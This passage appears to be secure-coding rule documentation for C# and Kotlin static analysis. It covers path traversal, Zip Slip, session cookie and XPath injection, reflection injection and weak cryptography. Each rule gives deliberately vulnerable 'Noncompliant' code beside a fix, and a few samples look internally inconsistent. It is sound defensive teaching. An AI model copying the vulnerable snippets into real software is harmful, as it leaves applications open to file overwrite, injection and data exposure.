
Compliant solution

public class ExampleController : Controller
{
    private static string TargetDirectory = "/path/to/target/directory/";

    public void Example(string filename)
    {
        string path = Path.Combine(TargetDirectory, filename);
        string canonicalDestinationPath = Path.GetFullPath(path);

        if (canonicalDestinationPath.StartsWith(TargetDirectory, StringComparison.Ordinal))
        {
            System.IO.File.Delete(canonicalDestinationPath);
        }
    }
}

How does this work?

Canonical path validation

If it is impossible to use secure-by-design APIs that do this automatically, the universal way to prevent path injection is to validate paths constructed from untrusted data:

  1. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.
  2. Resolve the canonical path of the file by using methods like System.IO.Path.GetFullPath. This will resolve relative path or path components like ../ and removes any ambiguity regarding the file’s location.
  3. Check that the canonical path is within the directory where the file should be located.

Important Note: The order of this process pattern is important. The code must follow this order exactly to be secure by design:

  1. data = transform(user_input);
  2. data = normalize(data);
  3. data = sanitize(data);
  4. use(data);

As pointed out in this SonarSource talk, failure to follow this exact order leads to security vulnerabilities.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation string contains a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string TargetDirectory does not end with a path separator:

private static string TargetDirectory = "/Users/John";

public void Example(string filename)
{
    string canonicalDestinationPath = Path.GetFullPath(filename);

    if (canonicalDestinationPath.StartsWith(TargetDirectory, StringComparison.Ordinal))
    {
        System.IO.File.Delete(canonicalDestinationPath);
    }
}

This check can be bypassed because "/Users/Johnny/file".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.

Here is a real-life example of this vulnerability.

Do not use Path.Combine as a validator

The official documentation states that if any argument other than the first is an absolute path, any previous argument is discarded.

This means that including untrusted data in any of the parameters and using the resulting string for file operations may lead to a path traversal vulnerability.

Resources

Standards

roslyn.sonaranalyzer.security.cs:S6287

Why is this an issue?

Session Cookie Injection occurs when a web application assigns session cookies to users using untrusted data.

Session cookies are used by web applications to identify users. Thus, controlling these enable control over the identity of the users within the application.

The injection might occur via a GET parameter, and the payload, for example, https://example.com?cookie=injectedcookie, delivered using phishing techniques.

What is the potential impact?

A well-intentioned user opens a malicious link that injects a session cookie in their web browser. This forces the user into unknowingly browsing a session that isn’t theirs.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Sensitive data disclosure

A victim introduces sensitive data within the attacker’s application session that can later be retrieved by them. This can lead to a variety of implications depending on what type of data is disclosed. Strictly confidential user data or organizational data leakage have different impacts.

Vulnerability chaining

An attacker not only manipulates a user into browsing an application using a session cookie of their control but also successfully detects and exploits a self-XSS on the target application.
The victim browses the vulnerable page using the attacker’s session and is affected by the XSS, which can then be used for a wide range of attacks including credential stealing using mirrored login pages.

How to fix it in ASP.NET

Code examples

The following code is vulnerable to Session Cookie Injection as it assigns a session cookie using untrusted data.

Noncompliant code example

using System.Web;
using System.Web.Mvc;

public class ExampleController : Controller
{
    [HttpGet]
    public IActionResult CheckCookie(string cookie)
    {
        if (Request.Cookies["ASP.NET_SessionId"] == null)
        {
            Response.Cookies.Append("ASP.NET_SessionId", cookie);
        }

        return View("Welcome");
    }
}

Compliant solution

using System.Web;
using System.Web.Mvc;

public class ExampleController : Controller
{
    [HttpGet]
    public IActionResult CheckCookie()
    {
        if (Request.Cookies["ASP.NET_SessionId"] == null)
        {
            return View("GetCookie");
        }

        return View("Welcome");
    }
}

How does this work?

Untrusted data, such as GET or POST request content, should always be considered tainted. Therefore, an application should not blindly assign the value of a session cookie to untrusted data.

Session cookies should be generated using the built-in APIs of secure libraries that include session management instead of developing homemade tools.
Often, these existing solutions benefit from quality maintenance in terms of features, security, or hardening, and it is usually better to use these solutions than to develop your own.

Resources

Standards

roslyn.sonaranalyzer.security.cs:S6173

Why is this an issue?

Reflection injections occur in a web application when it retrieves data from a user or a third-party service and fully or partially uses it to inspect, load or invoke a component by name.

If an application uses a reflection method in a way that is vulnerable to injections, it is exposed to attacks that aim to achieve remote code execution on the server’s website.

A user with malicious intent exploits this by carefully crafting a string involving symbols such as class methods, that will help them change the initial reflection logic to an impactful malicious one.

After creating the malicious request and triggering it, the attacker can attack the servers affected by this vulnerability without relying on any pre-requisites.

What is the potential impact?

If user-supplied values are used to choose which code is executed, an attacker may be able to supply carefully-chosen values that cause unexpected code to run. The attacker can use this ability to run arbitrary code on the server.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attackers succeed in injecting a seemingly-legitimate object, but whose properties might be used maliciously.

Depending on the application, attackers might be able to modify important data structures or content to escalate privileges or perform unwanted actions. For example, with an e-commerce application, this could be changing the number of products or prices.

Full application compromise

In the worst-case scenario, the attackers succeed in injecting an object triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker additionally manages to elevate their privileges as an administrator and attack other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised through a combination of unsafe deserialization and misconfiguration:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in .NET

Code examples

In the following example, the code simulates a feature in an image editing application that allows users to install plugins to add new filters or effects. It assumes the user will give a known name, such as "SepiaEffect".

Noncompliant code example

public class ExampleController : Controller
{
    public IActionResult Apply(string EffectName)
    {
        var EffectInstance  = Activator.CreateInstance(null, EffectName); // Noncompliant
        object EffectPlugin = EffectInstance.Unwrap();

        if ( ((IEffect)EffectPlugin).ApplyFilter() )
        {
            return Ok();
        }
        else
        {
            return Problem();
        }
    }
}

public interface IEffect
{
    bool ApplyFilter();
}

Compliant solution

public class ExampleController : Controller
{
    private static readonly string[] EFFECT_ALLOW_LIST = {
        "SepiaEffect",
        "BlackAndWhiteEffect",
        "WaterColorEffect",
        "OilPaintingEffect"
    };

    public IActionResult Apply(string EffectName)
    {
        if (!EFFECT_ALLOW_LIST.Contains(EffectName))
        {
            return BadRequest("Invalid effect name. The effect is not allowed.");
        }

        var EffectInstance  = Activator.CreateInstance(null, EffectName);
        object EffectPlugin = EffectInstance.Unwrap();

        if ( ((IEffect)EffectPlugin).ApplyFilter() )
        {
            return Ok();
        }
        else
        {
            return Problem();
        }
    }
}

public interface IEffect
{
    bool ApplyFilter();
}

How does this work?

Pre-Approved commands

The cleanest way to avoid this defect is to validate the input before using it in a reflection method.

Create a list of authorized and secure classes that you want the application to be able to execute.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must do validation on the server side. Not on client-side front-ends.

Resources

Articles & blog posts

Standards

roslyn.sonaranalyzer.security.cs:S6096

Why is this an issue?

Zip slip is a special case of path injection. It occurs when an application uses the name of an archive entry to construct a file path and access this file without validating its path first.

This rule will consider all archives untrusted, assuming they have been created outside the application file system.

A user with malicious intent would inject specially crafted values, such as ../, in the archive entry name to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access.

What is the potential impact?

A web application is vulnerable to Zip Slip and an attacker is able to exploit it by submitting an archive he controls.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override arbitrary files

The application opens the archive to copy its entries to the file system. The entries' names contain path traversal payloads for existing files in the system, which are overwritten once the entries are copied. The vulnerability is exploited to corrupt files critical for the application or operating system to work properly.

It could result in data being lost or the application being unavailable.

How to fix it in .NET

Code examples

The following code is vulnerable to Zip Slip as it is constructing a path using an archive entry name. This path is then used to copy a file without being validated first. Therefore, it can be leveraged by an attacker to overwrite arbitrary files.

Noncompliant code example

public class ExampleController : Controller
{
    private static string TargetDirectory = "/example/directory/";

    public void ExtractEntry(IEnumerator<ZipArchiveEntry> entriesEnumerator)
    {
        ZipArchiveEntry entry = entriesEnumerator.Current;
        string destinationPath = Path.Combine(TargetDirectory, entry.FullName);

        entry.ExtractToFile(destinationPath);
    }
}

Compliant solution

public class ExampleController : Controller
{
    private static string TargetDirectory = "/example/directory/";

    public void ExtractEntry(IEnumerator<ZipArchiveEntry> entriesEnumerator)
    {
        ZipArchiveEntry entry = entriesEnumerator.Current;
        string destinationPath = Path.Combine(TargetDirectory, entry.FullName);
        string canonicalDestinationPath = Path.GetFullPath(destinationPath);

        if (canonicalDestinationPath.StartsWith(TargetDirectory, StringComparison.Ordinal))
        {
            entry.ExtractToFile(canonicalDestinationPath);
        }
    }
}

How does this work?

The universal way to prevent Zip Slip is to validate the paths constructed from untrusted archive entry names.

The validation should be done as follow:

  1. Resolve the canonical path of the file by using methods like System.IO.Path.GetFullPath or System.IO.Path.GetFileName. This will resolve relative path or path components like ../ and removes any ambiguity regarding the file’s location.
  2. Check that the canonical path is within the directory where the file should be located.
  3. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation strings all contain a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string TargetDirectory does not end with a path separator:

static private String TargetDirectory = "/Users/John";

public void ExtractEntry(IEnumerator<ZipArchiveEntry> entriesEnumerator)
{
    ZipArchiveEntry entry = entriesEnumerator.Current;
    string canonicalDestinationPath = Path.GetFullPath(TargetDirectory);

    if (canonicalDestinationPath.StartsWith(TargetDirectory, StringComparison.Ordinal))
    {
        entry.ExtractToFile(canonicalDestinationPath);
    }
}

This check can be bypassed because "/Users/Johnny".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.

Here is a real-life example of this vulnerability.

Resources

Documentation

  • snyk - Zip Slip Vulnerability

Standards

roslyn.sonaranalyzer.security.cs:S2091

Why is this an issue?

XPath injections occur in an application when the application retrieves untrusted data and inserts it into an XML Path (XPath) query without sanitizing it first.

What is the potential impact?

In the context of a web application vulnerable to XPath injection:
After discovering the injection point, attackers insert data into the vulnerable field to execute malicious commands in the affected XML documents.

The impact of this vulnerability depends on the importance of XML structures in the enterprise.
In cases where organizations rely on XML structures for business-critical operations or where XML is used only for innocuous data transport, the severity of an attack ranges from critical to harmless.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data Leaks

A malicious XPath query allows direct data leakage from one or more databases. Although XML is not as widely used as it once was, this possibility still exists with configuration files, for example.

Data deletion and denial of service

The malicious query allows the attacker to delete data in the affected XML documents.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) and if XML structures are considered important, as missing critical data can disrupt the regular operations of an organization.

How to fix it in .NET

Code examples

The following code is vulnerable to XPath injections because untrusted data is concatenated in an XPath query without prior validation.

Noncompliant code example

public class ExampleController : Controller
{
    [HttpGet]
    public IActionResult Authenticate(string user, string pass)
    {
        XmlDocument doc = new XmlDocument();

        String expression = "/users/user[@name='" + user + "' and @pass='" + pass + "']";

        return Json(doc.SelectSingleNode(expression) != null);
    }
}

Compliant solution

public class ExampleController : Controller
{
    [HttpGet]
    public IActionResult Authenticate(string user, string pass)
    {
        XmlDocument doc = new XmlDocument();
        if (!Regex.IsMatch(user, "^[a-zA-Z]+$") || !Regex.IsMatch(pass, "^[a-zA-Z]+$"))
        {
            return BadRequest();
        }

        String expression = "/users/user[@name='" + user + "' and @pass='" + pass + "']";

        return Json(doc.SelectSingleNode(expression) != null);
    }
}

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

Validation

In case XPath parameterized queries are not available, the most secure way to protect against injections is to validate the input before using it in an XPath query.

Important: The application must do this validation server-side. Validating this client-side is insecure.

Input can be validated in multiple ways:

  • By checking against a list of authorized and secure strings that the application is allowed to use in a query.
  • By ensuring user input is restricted to a specific range of characters (e.g., the regex /^[a-zA-Z0-9]*$/ only allows alphanumeric characters.)
  • By ensuring user input does not include any XPath metacharacters, such as ", ', /, @, =, *, [, ], ( and ).

If user input is not considered valid, it should be rejected as it is unsafe.

In the example, a validation mechanism is applied to untrusted input to ensure it is strictly composed of alphabetic characters.

Resources

Articles & blog posts

Standards

kotlin:S6301

Why is this an issue?

Storing data locally is a common task for mobile applications. There are many convenient solutions that allow storing data persistently, for example SQLiteDatabase and Realm. These systems can be initialized with a secret key in order to store the data encrypted.

The encryption key is meant to stay secret and should not be hard-coded in the application as it would mean that:

  • All user would use the same encryption key.
  • The encryption key would be known by anyone who as access to the source code or the application binary code.
  • Data stored encrypted in the database would not be protected.

There are different approaches how the key can be provided to encrypt and decrypt the database. One of the most convinient way to is to rely on EncryptedSharedPreferences to store encryption keys. It can also be provided dynamically by the user of the application or fetched from a remote server.

Noncompliant code example

SQLCipher

val key = "gb09ym9ydoolp3w886d0tciczj6ve9kszqd65u7d126040gwy86xqimjpuuc788g"
val db = SQLiteDatabase.openOrCreateDatabase("test.db", key, null) // Noncompliant

Realm

val key = "gb09ym9ydoolp3w886d0tciczj6ve9kszqd65u7d126040gwy86xqimjpuuc788g"
val config = RealmConfiguration.Builder()
    .encryptionKey(key.toByteArray()) // Noncompliant
    .build()
val realm = Realm.getInstance(config)

Compliant solution

SQLCipher

val db = SQLiteDatabase.openOrCreateDatabase("test.db", getKey(), null)

Realm

val config = RealmConfiguration.Builder()
    .encryptionKey(getKey())
    .build()
val realm = Realm.getInstance(config)

Resources

kotlin:S6300

Storing files locally is a common task for mobile applications. Files that are stored unencrypted can be read out and modified by an attacker with physical access to the device. Access to sensitive data can be harmful for the user of the application, for example when the device gets stolen.

Ask Yourself Whether

  • The file contains sensitive data that could cause harm when leaked.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to password-encrypt local files that contain sensitive information. The class EncryptedFile can be used to easily encrypt files.

Sensitive Code Example

val targetFile = File(activity.filesDir, "data.txt")
targetFile.writeText(fileContent)  // Sensitive

Compliant Solution

val mainKey = MasterKeys.getOrCreate(MasterKeys.AES256_GCM_SPEC)

val encryptedFile = EncryptedFile.Builder(
    File(activity.filesDir, "data.txt"),
    activity,
    mainKey,
    EncryptedFile.FileEncryptionScheme.AES256_GCM_HKDF_4KB
).build()

encryptedFile.openFileOutput().apply {
    write(fileContent)
    flush()
    close()
}

See

kotlin:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

val params = "password=xxxx" // Sensitive
val writer = OutputStreamWriter(getOutputStream())
writer.write(params)
writer.flush()
...
val password = "xxxx" // Sensitive
...

Compliant Solution

val params = "password=${retrievePassword()}"
val writer = OutputStreamWriter(getOutputStream())
writer.write(params)
writer.flush()
...
val password = retrievePassword()
...

See

kotlin:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

These clients from Apache commons net libraries are based on unencrypted protocols and are not recommended:

val telnet = TelnetClient(); // Sensitive

val ftpClient = FTPClient(); // Sensitive

val smtpClient = SMTPClient(); // Sensitive

Unencrypted HTTP connections, when using okhttp library for instance, should be avoided:

val spec: ConnectionSpec = ConnectionSpec.Builder(ConnectionSpec.CLEARTEXT) // Sensitive
  .build()

Android WebView can be configured to allow a secure origin to load content from any other origin, even if that origin is insecure (mixed content):

import android.webkit.WebView

val webView: WebView = findViewById(R.id.webview)
webView.getSettings().setMixedContentMode(MIXED_CONTENT_ALWAYS_ALLOW) // Sensitive

Compliant Solution

Use instead these clients from Apache commons net and JSch/ssh library:

JSch jsch = JSch();

if(implicit) {
  // implicit mode is considered deprecated but offer the same security than explicit mode
  val ftpsClient = FTPSClient(true);
}
else {
  val ftpsClient = FTPSClient();
}

if(implicit) {
  // implicit mode is considered deprecated but offer the same security than explicit mode
  val smtpsClient = SMTPSClient(true);
}
else {
  val smtpsClient = SMTPSClient();
  smtpsClient.connect("127.0.0.1", 25);
  if (smtpsClient.execTLS()) {
    // commands
  }
}

Perform HTTP encrypted connections, with okhttp library for instance:

val spec: ConnectionSpec =ConnectionSpec.Builder(ConnectionSpec.MODERN_TLS)
  .build()

The most secure mode for Android WebView is MIXED_CONTENT_NEVER_ALLOW:

import android.webkit.WebView

val webView: WebView = findViewById(R.id.webview)
webView.getSettings().setMixedContentMode(MIXED_CONTENT_NEVER_ALLOW)

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

kotlin:S6432

Why is this an issue?

When encrypting data with Counter (CTR) derived block cipher modes of operation, it is essential not to reuse the same initialization vector (IV) with a given key, such IV is called a "nonce" (number used only once). Galois/Counter (GCM) and Counter with Cipher Block Chaining-Message Authentication Code (CCM) are both CTR-based modes of operation.

An attacker, who has knowledge of one plaintext (original content) and ciphertext (encrypted content) pair, is able to retrieve the corresponding plaintext of any other ciphertext generated with the same IV and key. It also drastically decreases the key recovery computational complexity by downgrading it to a simpler polynomial root-finding problem.

When using GCM, NIST recommends a 96 bit length nonce using a 'Deterministic' approach or at least 96 bits using a 'Random Bit Generator (RBG)'. The 'Deterministic' construction involves a counter, which increments per encryption process. The 'RBG' construction, as the name suggests, generates the nonce using a random bit generator. Collision probabilities (nonce-key pair reuse) using the 'RBG-based' approach require a shorter key rotation period, 2^32 maximum invocations per key.

Noncompliant code example

fun encrypt(key: ByteArray, ptxt: ByteArray) {
    val nonce: ByteArray = "7cVgr5cbdCZV".toByteArray() // The initialization vector is a static value

    val gcmSpec  = GCMParameterSpec(128, nonce) // The initialization vector is configured here
    val skeySpec = SecretKeySpec(key, "AES")

    val cipher: Cipher = Cipher.getInstance("AES/GCM/NoPadding")
    cipher.init(Cipher.ENCRYPT_MODE, skeySpec, gcmSpec) // Noncompliant
}

Compliant solution

fun encrypt(key: ByteArray, ptxt: ByteArray) {
    val random: SecureRandom = SecureRandom()
    val nonce: ByteArray     = ByteArray(12)
    random.nextBytes(nonce) // Random 96 bit IV

    val gcmSpec  = GCMParameterSpec(128, nonce)
    val skeySpec = SecretKeySpec(key, "AES")

    val cipher: Cipher = Cipher.getInstance("AES/GCM/NoPadding")
    cipher.init(Cipher.ENCRYPT_MODE, skeySpec, gcmSpec)
}

Resources

kotlin:S3329

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In the mode Cipher Block Chaining (CBC), each block is used as cryptographic input for the next block. For this reason, the first block requires an initialization vector (IV), also called a "starting variable" (SV).

If the same IV is used for multiple encryption sessions or messages, each new encryption of the same plaintext input would always produce the same ciphertext output. This may allow an attacker to detect patterns in the ciphertext.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, a company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Java Cryptographic Extension

Code examples

Noncompliant code example

import java.nio.charset.StandardCharsets
import java.security.InvalidAlgorithmParameterException
import java.security.InvalidKeyException
import java.security.NoSuchAlgorithmException
import javax.crypto.Cipher
import javax.crypto.NoSuchPaddingException
import javax.crypto.spec.GCMParameterSpec
import javax.crypto.spec.SecretKeySpec

fun encrypt(key: String, plainText: String) {

    val randomBytes = "7cVgr5cbdCZVw5WY".toByteArray(StandardCharsets.UTF_8)

    val iv      = GCMParameterSpec(128, randomBytes)
    val keySpec = SecretKeySpec(key.toByteArray(StandardCharsets.UTF_8), "AES")

    try {
        val cipher = Cipher.getInstance("AES/CBC/NoPadding")
        cipher.init(Cipher.ENCRYPT_MODE, keySpec, iv) // Noncompliant

    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: InvalidKeyException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    } catch (e: InvalidAlgorithmParameterException) {
        // ...
    }
}

Compliant solution

In this example, the code explicitly uses a number generator that is considered strong.

import java.nio.charset.StandardCharsets
import java.security.SecureRandom
import java.security.InvalidAlgorithmParameterException
import java.security.InvalidKeyException
import java.security.NoSuchAlgorithmException
import javax.crypto.Cipher
import javax.crypto.NoSuchPaddingException
import javax.crypto.spec.GCMParameterSpec
import javax.crypto.spec.SecretKeySpec

fun encrypt(key: String, plainText: String) {

    val random      = SecureRandom();
    val randomBytes = ByteArray(16);
    random.nextBytes(randomBytes);

    val iv      = GCMParameterSpec(128, randomBytes)
    val keySpec = SecretKeySpec(key.toByteArray(StandardCharsets.UTF_8), "AES")

    try {
        val cipher = Cipher.getInstance("AES/CBC/NoPadding")
        cipher.init(Cipher.ENCRYPT_MODE, keySpec, iv)

    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: InvalidKeyException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    } catch (e: InvalidAlgorithmParameterException) {
        // ...
    }
}

How does this work?

Use unique IVs

To ensure strong security, the initialization vectors for each encryption operation must be unique and random but they do not have to be secret.

In the previous non-compliant example, the problem is not that the IV is hard-coded.
It is that the same IV is used for multiple encryption attempts.

Resources

Standards

kotlin:S4347

Why is this an issue?

The java.security.SecureRandom class provides a strong random number generator (RNG) appropriate for cryptography. However, seeding it with a constant or another predictable value will weaken it significantly. In general, it is much safer to rely on the seed provided by the SecureRandom implementation.

This rule raises an issue when SecureRandom.setSeed() or SecureRandom(byte[]) are called with a seed that is either one of:

  • a constant
  • the system time

Noncompliant code example

val sr = SecureRandom()
sr.setSeed(123456L) // Noncompliant
val v = sr.nextInt()
val sr = SecureRandom("abcdefghijklmnop".toByteArray(charset("us-ascii"))) // Noncompliant
val v = sr.nextInt()

Compliant solution

val sr = SecureRandom()
val v = sr.nextInt()

Resources

kotlin:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on applications distributed to end users.

Sensitive Code Example

WebView.setWebContentsDebuggingEnabled(true) for Android enables debugging support:

import android.webkit.WebView

WebView.setWebContentsDebuggingEnabled(true) // Sensitive

Compliant Solution

WebView.setWebContentsDebuggingEnabled(false) for Android disables debugging support:

import android.webkit.WebView

WebView.setWebContentsDebuggingEnabled(false)

See

kotlin:S6363

WebViews can be used to display web content as part of a mobile application. A browser engine is used to render and display the content. Like a web application, a mobile application that uses WebViews can be vulnerable to Cross-Site Scripting if untrusted code is rendered.

If malicious JavaScript code in a WebView is executed this can leak the contents of sensitive files when access to local files is enabled.

Ask Yourself Whether

  • No local files have to be accessed by the Webview.
  • The WebView contains untrusted data that could cause harm when rendered.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to disable access to local files for WebViews unless it is necessary. In the case of a successful attack through a Cross-Site Scripting vulnerability the attackers attack surface decreases drastically if no files can be read out.

Sensitive Code Example

import android.webkit.WebView

val webView: WebView = findViewById(R.id.webview)
webView.getSettings().setAllowContentAccess(true) // Sensitive
webView.getSettings().setAllowFileAccess(true) // Sensitive

Compliant Solution

import android.webkit.WebView

val webView: WebView = findViewById(R.id.webview)
webView.getSettings().setAllowContentAccess(false)
webView.getSettings().setAllowFileAccess(false)

See

kotlin:S6362

WebViews can be used to display web content as part of a mobile application. A browser engine is used to render and display the content. Like a web application, a mobile application that uses WebViews can be vulnerable to Cross-Site Scripting if untrusted code is rendered. In the context of a WebView, JavaScript code can exfiltrate local files that might be sensitive or even worse, access exposed functions of the application that can result in more severe vulnerabilities such as code injection. Thus JavaScript support should not be enabled for WebViews unless it is absolutely necessary and the authenticity of the web resources can be guaranteed.

Ask Yourself Whether

  • The WebWiew only renders static web content that does not require JavaScript code to be executed.
  • The WebView contains untrusted data that could cause harm when rendered.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to disable JavaScript support for WebViews unless it is necessary to execute JavaScript code. Only trusted pages should be rendered.

Sensitive Code Example

import android.webkit.WebView

val webView: WebView = findViewById(R.id.webview)
webView.getSettings().setJavaScriptEnabled(true) // Sensitive

Compliant Solution

import android.webkit.WebView

val webView: WebView = findViewById(R.id.webview)
webView.getSettings().setJavaScriptEnabled(false)

See

kotlin:S5322

Android applications can receive broadcasts from the system or other applications. Receiving intents is security-sensitive. For example, it has led in the past to the following vulnerabilities:

Receivers can be declared in the manifest or in the code to make them context-specific. If the receiver is declared in the manifest Android will start the application if it is not already running once a matching broadcast is received. The receiver is an entry point into the application.

Other applications can send potentially malicious broadcasts, so it is important to consider broadcasts as untrusted and to limit the applications that can send broadcasts to the receiver.

Permissions can be specified to restrict broadcasts to authorized applications. Restrictions can be enforced by both the sender and receiver of a broadcast. If permissions are specified when registering a broadcast receiver, then only broadcasters who were granted this permission can send a message to the receiver.

This rule raises an issue when a receiver is registered without specifying any broadcast permission.

Ask Yourself Whether

  • The data extracted from intents is not sanitized.
  • Intents broadcast is not restricted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Restrict the access to broadcasted intents. See the Android documentation for more information.

Sensitive Code Example

import android.content.BroadcastReceiver
import android.content.Context
import android.content.IntentFilter
import android.os.Build
import android.os.Handler
import androidx.annotation.RequiresApi

class MyIntentReceiver {
    @RequiresApi(api = Build.VERSION_CODES.O)
    fun register(
        context: Context, receiver: BroadcastReceiver?,
        filter: IntentFilter?,
        scheduler: Handler?,
        flags: Int
    ) {
        context.registerReceiver(receiver, filter) // Sensitive
        context.registerReceiver(receiver, filter, flags) // Sensitive

        // Broadcasting intent with "null" for broadcastPermission
        context.registerReceiver(receiver, filter, null, scheduler) // Sensitive
        context.registerReceiver(receiver, filter, null, scheduler, flags) // Sensitive
    }
}

Compliant Solution

import android.content.BroadcastReceiver
